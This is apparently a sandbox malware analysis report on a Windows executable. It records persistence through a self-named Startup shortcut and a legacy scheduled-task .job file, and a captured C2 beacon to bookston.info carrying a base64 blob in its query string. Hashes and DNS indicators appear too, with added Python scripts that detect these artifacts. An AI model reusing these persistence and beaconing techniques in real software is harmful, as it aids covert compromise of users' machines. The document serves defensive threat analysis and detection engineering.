Analysis
The figures below are from behavioral2, the Windows 10 run (platform windows10-2004_x64); the same sample was also queued against a Windows 7 image as behavioral1.
max time kernel: 88s
max time network: 136s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/10/2022, 12:33 UTC

Static task: static1
Behavioral task: behavioral1
  Sample: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
  Resource: win10v2004-20220901-en
General
Target: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
Size: 295KB
MD5: 91e2443a602bf99accecf6e13c04ff50
SHA1: 4516b0b4377a2f8e59d49f3accc9eb2bed0d8271
SHA256: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7
SHA512: f6dddafbe2ad2ae1a71422b1e0471a635a68f36ec4f934b7a74d72a6b6addaed0ea74e33a276e4dada4a1f4e29f7d756ddde667c4f93a1a56101fe24bbf8f112
SSDEEP: 6144:VQ6Yd0LZbZhY2U1FCDvzqQy/yvnSV+1hSDh8rkcMgJHK35ITm:VQMZbZhYiDucaV+1h6LcoJ7
Malware Config
(nothing extracted)

Signatures
Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.lnk
  Process: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
  The shortcut carries the sample's own name and sits in the per-user Startup folder, so whatever it points at runs at every logon of that user. The report does not show the shortcut's target.
Drops file in Windows directory (1 IoC)
  File created: C:\Windows\Tasks\Bidaily Synchronize Task.job
  Process: 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
  A .job file under C:\Windows\Tasks is the legacy Task Scheduler 1.0 format (written through the ITaskScheduler API); Windows 10 keeps its own tasks as XML under C:\Windows\System32\Tasks, so a freshly written .job file is a strong persistence signal by itself. The task's trigger and command are not part of this report.
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  This is the sandbox's generic heuristic for drive enumeration; nothing else among the reported signatures (no bulk file writes, no ransom note) supports the ransomware label, so treat it as enumeration only.

Processes
(none listed)
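The two file-create IoCs above are the kind of thing a detection engineer turns into a rule. The following is an added example, not code from the Triage report or from the sample: it matches constructed FileCreate events (creating process plus target path, the shape a Sysmon Event ID 11 feed delivers) against the Startup-folder and C:\Windows\Tasks\*.job patterns, notes when the shortcut is named after the process that wrote it, and maps each hit to its ATT&CK technique. The event shape, the benign events and the installer allowlist are assumptions made for this example.

```python
# Persistence-artifact matcher for the two file-create IoCs in this report.
# Added example: the events, the installer allowlist and the severity scheme
# are assumptions for illustration, not part of the report or the sample.
import ntpath
import re

# Constructed events (not from the report). The first two replay the paths the
# sandbox reported; the other three are benign activity for contrast.
SAMPLE = "38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe"
EVENTS = [
    (SAMPLE, r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
             r"\38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.lnk"),
    (SAMPLE, r"C:\Windows\Tasks\Bidaily Synchronize Task.job"),
    ("explorer.exe", r"C:\Users\Admin\Documents\report.docx"),
    ("svchost.exe", r"C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"),
    ("msiexec.exe", r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Vendor Tray.lnk"),
]

# Path patterns: the Startup folder (per-user under AppData\Roaming or all-users
# under ProgramData) and the Task Scheduler 1.0 job directory.
RULES = [
    ("startup-folder-shortcut", "T1547.001",
     re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
    ("legacy-job-file", "T1053.005",
     re.compile(r"^[A-Za-z]:\\Windows\\Tasks\\[^\\]+\.job$", re.I)),
]

# Processes that legitimately write Startup shortcuts during installs; their
# hits are kept but scored lower (assumed allowlist for this example).
INSTALLERS = {"msiexec.exe", "setup.exe"}


def classify(process, path):
    """Return a finding for one FileCreate event, or None if no rule matches."""
    path = path.replace("/", "\\")
    for rule, technique, pattern in RULES:
        if not pattern.search(path):
            continue
        proc_name = ntpath.basename(process).lower()
        proc_stem = ntpath.splitext(proc_name)[0]
        file_stem = ntpath.splitext(ntpath.basename(path))[0].lower()
        # A shortcut named after the process that wrote it is the pattern in
        # this report: the dropper pointing the Startup folder at itself.
        self_named = proc_stem == file_stem
        severity = "low" if proc_name in INSTALLERS else "high"
        return {"rule": rule, "technique": technique, "process": process,
                "path": path, "self_named": self_named, "severity": severity}
    return None


def scan(events):
    """Run classify over (process, path) pairs and collect the findings."""
    return [f for f in (classify(proc, path) for proc, path in events) if f]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding["severity"], finding["technique"], finding["rule"], finding["path"])
```

Run against the constructed events, the two report paths come back as high-severity T1547.001 and T1053.005 findings and the msiexec shortcut as a low-severity one; the System32\Tasks write by svchost.exe does not match because modern tasks are not .job files.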
Network
DNS (via 8.8.8.8:53)
  membero.info  IN A  -> no A record in the response
  bookston.info IN A  -> 58.158.177.102
HTTP (process 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe -> 58.158.177.102:80)
  Request
    GET /hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
    Host: bookston.info
  Response
    HTTP/1.1 404 Not Found
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
    Content-Length: 201
    Content-Type: text/html; charset=iso-8859-1

Notes on the beacon
  The only outbound HTTP is one GET whose entire payload rides in the q parameter: 468 characters drawn from the base64 alphabet, with + and / percent-encoded and no padding, which is 351 bytes of binary once decoded. The server answered with a generic Apache 404 and a 201-byte body, so no second stage was retrieved in this run; whether the 404 is the real C2 reply or the server being down cannot be told from this capture.
  The User-Agent claims Windows NT 6.3 (Windows 8.1) and Chrome 42 (a 2015 build) while the sample ran on Windows 10 2004, so the string is hard-coded in the binary rather than taken from the host. That mismatch, the /hp/?q= path shape and the two .info domains are the network indicators worth pivoting on; the Server header is stock CentOS Apache and not distinctive.
Traffic summary (one row per flow: bytes sent, bytes received, packets out, packets in)
Remote address       Proto  Process                                                                  Sent   Recv    Out  In
58.158.177.102:80    http   38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe     903 B  513 B   5    3
  HTTP request: GET http://bookston.info/hp/?q=... (full request above) -> 404
(not shown)          -      -                                                                        322 B  -       7    -
(not shown)          -      -                                                                        611 B  7.4kB   9    9
(not shown)          -      -                                                                        322 B  -       7    -
(not shown)          -      -                                                                        322 B  -       7    -
(not shown)          -      -                                                                        322 B  -       7    -
(not shown)          dns    -                                                                        58 B   137 B   1    1
  DNS request: membero.info (137-byte reply, no A record)
(not shown)          dns    -                                                                        59 B   75 B    1    1
  DNS request: bookston.info -> 58.158.177.102
The remote address, protocol and process for the rows marked "(not shown)" are absent from the report as captured; the three 322 B / 7-packet rows record sent bytes and outgoing packets only.
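The request above is what a proxy log would show for this beacon. As an added example, not code from the Triage report or from the sample, the following Python scans constructed proxy log lines for a GET whose query is a single long base64 blob, decodes the blob (re-padding it, since the sample strips the = characters), reports its size and byte entropy, and flags a User-Agent that claims a Windows version other than the host's. The captured q value and User-Agent are taken from the report; the log line format, the benign lines, the 200-character threshold and the host version are assumptions for this example.

```python
# Beacon triage for the HTTP request in this report. Added example: the log
# format, thresholds and benign lines are assumptions, not part of the report.
import base64
import binascii
import math
import re
from urllib.parse import unquote, urlsplit

# The query value and User-Agent exactly as captured in the report.
CAPTURED_Q = "BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI"
CAPTURED_UA = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36"

# Constructed proxy log (not from the report); assumed line format:
# ts src dst method url "user-agent" status. Line 1 replays the captured
# request; lines 2 and 3 are benign browsing for contrast.
SAMPLE_LOG = (
    f'2022-10-19T12:34:01Z 10.0.0.5 58.158.177.102 GET http://bookston.info/hp/?q={CAPTURED_Q} "{CAPTURED_UA}" 404\n'
    '2022-10-19T12:34:05Z 10.0.0.5 93.184.216.34 GET http://example.com/search?q=windows+update&page=2 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 200\n'
    '2022-10-19T12:34:09Z 10.0.0.5 93.184.216.34 GET http://example.com/static/app.js?v=20220901 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 200\n'
)

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d+)$')
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
NT_RE = re.compile(r"Windows NT (\d+\.\d+)")


def parse_line(line):
    """One proxy log line -> dict, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return dict(zip(("ts", "src", "dst", "method", "url", "ua", "status"), m.groups()))


def decode_blob(value):
    """URL-decode a query value and base64-decode it, re-adding the '=' padding
    the sender stripped. Returns None when the value is not base64."""
    raw = unquote(value)
    if not B64_RE.match(raw) or len(raw) % 4 == 1:
        return None
    try:
        return base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
    except binascii.Error:
        return None


def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0; long encrypted or compressed streams approach 8."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def claimed_windows_nt(ua):
    """The 'Windows NT x.y' version a User-Agent claims, or None."""
    m = NT_RE.search(ua)
    return m.group(1) if m else None


def check_entry(entry, host_nt="10.0", min_param_len=200):
    """Finding for a suspicious entry, else None. Heuristic (thresholds assumed
    for this example): a GET whose query is exactly one parameter holding a
    base64 blob of at least min_param_len characters."""
    if entry["method"] != "GET":
        return None
    parts = urlsplit(entry["url"])
    params = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(params) != 1 or len(params[0]) != 2 or len(params[0][1]) < min_param_len:
        return None
    name, value = params[0]
    blob = decode_blob(value)
    if blob is None:
        return None
    reasons = ["single-long-base64-param"]
    nt = claimed_windows_nt(entry["ua"])
    if nt is not None and nt != host_nt:
        reasons.append(f"ua-claims-nt-{nt}-on-nt-{host_nt}")
    return {"ts": entry["ts"], "dst": entry["dst"], "host": parts.hostname,
            "path": parts.path, "param": name, "blob_len": len(blob),
            "entropy": round(shannon_entropy(blob), 2), "reasons": reasons}


def triage_log(text, host_nt="10.0"):
    """Apply check_entry to every parseable line and return the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            finding = check_entry(entry, host_nt=host_nt)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding)
```

Only the replayed request is flagged: its q value decodes to 351 bytes, and the User-Agent's NT 6.3 does not match the Windows 10 host. The search query with two parameters and the short cache-buster on app.js pass untouched, which is the false-positive control a rule like this needs before it goes into a production pipeline; the entropy figure is reported rather than thresholded because a 351-byte sample is too short to separate encrypted from merely compressed data reliably.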